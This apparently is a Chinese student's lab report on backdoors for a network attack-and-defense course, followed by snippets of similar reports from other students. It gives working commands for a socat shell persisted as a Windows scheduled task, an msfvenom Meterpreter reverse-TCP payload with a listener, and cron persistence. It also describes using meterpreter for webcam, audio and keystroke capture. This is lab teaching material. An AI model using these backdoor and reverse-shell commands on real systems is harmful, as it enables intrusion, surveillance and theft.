关键词:
20155227《网络对抗》Exp2 后门原理与实践
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- Linux下可以通过cron来启动
- Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;
(3)Meterpreter有哪些给你映像深刻的功能?
- 获取摄像头以及对靶机直接截屏,感觉很方便很厉害的样子
(4)如何发现自己有系统有没有被安装后门?
实验准备(常用后门工具实践)
Windows获得Linux Shell
Linux获得Win Shell
-
Linux
运行监听指令
-
Windows
反弹连接Linux
-
Linux
下看到Windows
的命令提示
nc传输数据
如图:
实验内容及过程
1.使用netcat获取主机操作Shell,cron启动
2.使用socat获取主机操作Shell, 任务计划启动
-
在Windows
系统下,打开控制面板->管理工具->任务计划程序
,创建任务,填写任务名称后,新建一个触发器:
-
在操作->程序或脚本中选择你的socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5227 exec:cmd.exe,pty,stderr
-
运行刚刚创建的任务:
-
在kali中输入指令socat - tcp:192.168.56.1:5227
,此时可以发现已经成功获得了一个cmd shell
:
3.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
-
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.115.128 LPORT=5227 -f exe > 20155227_backdoor.exe
-
将生成的后门程序复制到Windows主机上,也可以通过nc
指令将生成的后门程序传送到Windows
主机上
-
在Kali
上使用msfconsole
指令进入msf
控制台,使用监听模块,设置payload
,设置反弹回连的IP和端口
:
-
打开Windows
上的后门程序
-
此时Kali
上已经获得了Windows
主机的连接,并且得到了远程控制的shell
:
4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
实验过程中遇到的问题及解决
实验体会
这次的实验非常有意思,使用MSF的时候,录音、截屏、照相、获取击键记录的实践让我在感到神奇的同时,也意识到我们的系统是很脆弱的。要保护好自己的隐私,就要提高安全意识。
20155218《网络对抗》exp2后门原理与实践(代码片段)
20155218《网络对抗》Exp2后门原理与实践常用后门工具实践1.Windows获得LinuxShell:在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5218端口,Windows下成功... 查看详情
20145317彭垚《网络对抗》exp2后门原理与实践
20145317彭垚《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;例举你知道的后门如何启动起来(win及linux)的方式... 查看详情
20145331魏澍琛《网络对抗》exp2后门原理与实践
20145331魏澍琛《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了。(... 查看详情
20155202张旭《网络对抗》exp2后门原理与实践(代码片段)
20155202张旭《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?捆绑在软件中注入在可执行文件里注入在office文件的宏里面例举你知道的后门如何启动起来(win及linux)的方式?更改... 查看详情
2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)
#2017-2018-2《网络对抗技术》20155322第五周Exp2后门原理与实践[博客目录]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-使用nc实现win,mac,Linux间的后门连接2.2-meterpreter的应用2.3-MSFPOST模块的应用2.4-注入Shellcode并执行3-... 查看详情
20155204王昊《网络对抗技术》exp2后门原理与实践(代码片段)
20155204王昊《网络对抗技术》EXP2后门原理与实践一、实验内容准备工作(试用ncat、socat)1.使用netcat获取主机操作Shell,cron启动。明确目标:要利用crontab命令从Windows获得linux的shell。在Windows下监听自定端口。用man命令查询crontab... 查看详情
20154306刘宇轩网络对抗exp2后门原理与实践(代码片段)
一、实践目标与内容1.学习内容使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的... 查看详情
20154324刘康权《网络对抗》exp2后门原理与实践(代码片段)
一、实践目标与内容1.学习内容使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的... 查看详情
2019-2020-2网络对抗技术20174326旦增列错exp2后门原理与实践(代码片段)
2019-2020-2网络对抗技术20174326旦增列错Exp2后门原理与实践目录一、实验介绍二、实验准备三、实验过程任务一:使用netcat实现windows,linux之间的后门连接任务二:使用socat获取主机操作Shell,任务计划启动任务三:MFSmeterpreter生... 查看详情
2019-2020-220175303柴轩达《网络对抗技术》exp2后门原理与实践(代码片段)
目录2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1.基础知识总结2.实验内容任务一任务二任务三任务四任务五3.问题与解决4.基础问题回答5.实验总结与体会2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1... 查看详情
网络对抗技术2017-2018-220152515exp2后门原理与实践(代码片段)
1.实验内容(1)使用netcat获取主机操作Shell,cron启动(0.5分)(2)使用socat获取主机操作Shell,任务计划启动(0.5分)(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)(4)使用MSFmeterpreter(... 查看详情
2018-2019-2网络对抗技术20165236exp2后门原理与实践
2018-2019-2网络对抗技术20165236Exp2后门原理与实践 一、实验内容(3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell,任务计划启动(0.5分) (3)使用MSFmeterpreter(或其他软件)生成可... 查看详情
20154329《网络对抗技术》后门原理与实践
#Exp2后门原理与实践 ##实验准备 1.知识储备 关于netcat: 又名nc,ncat.是一个底层工具,进行基本的TCPUDP数据收发。常被与其他工具结合使用,起到后门的作用。2.f附件准备 在课程主页下载附件ncat.exe... 查看详情
2019-2020-220175305张天钰《网络对抗技术》exp2后门原理与实践
2019-2020-220175305张天钰《网络对抗技术》Exp2后门原理与实践知识点概括后门:不经过正常认证流程而访问系统的通道。后门类型:编译器留后门操作系统留后门应用程序中留后门潜伏于操作系统中或伪装为特定应用的专用后门程... 查看详情
20165223《网络对抗技术》exp2后门原理与实践(代码片段)
目录——后门原理与实践后门原理与实践说明实验任务基础知识问答常用后门工具实验内容任务一:使用netcat获取主机操作Shell,cron启动任务二:使用socat获取主机操作Shell,任务计划启动任务三:使用MSFmeterpreter生成可执行文件... 查看详情
2018-2019-220165217《网络对抗技术》exp2后门原理与实践
2018-2019-220165217《网络对抗技术》Exp2后门原理与实践实验内容使用netcat获取主机操作Shell,cron启动使用socat获取主机操作Shell,任务计划启动使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机... 查看详情
2018-2019-2网络对抗技术20165318exp2后门原理与实践(代码片段)
2018-2019-2网络对抗技术20165318Exp2后门原理与实践后门的基本概念及实验内容常用后门工具netcatWin获得LinuxShellLinux获得WinShellMeterpreter实验内容任务一:使用netcat获取主机操作Shell,cron启动任务二:使用socat获取主机操作Shell,任务计... 查看详情
2019-2020-220175301李锦然《网络对抗技术》exp2后门原理与实践(代码片段)
2019-2020-220175301李锦然《网络对抗技术》Exp2后门原理与实践目录1.实践目标(1)使用netcat获取主机操作Shell,cron启动(0.5分)(2)使用socat获取主机操作Shell,任务计划启动(0.5分)(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat... 查看详情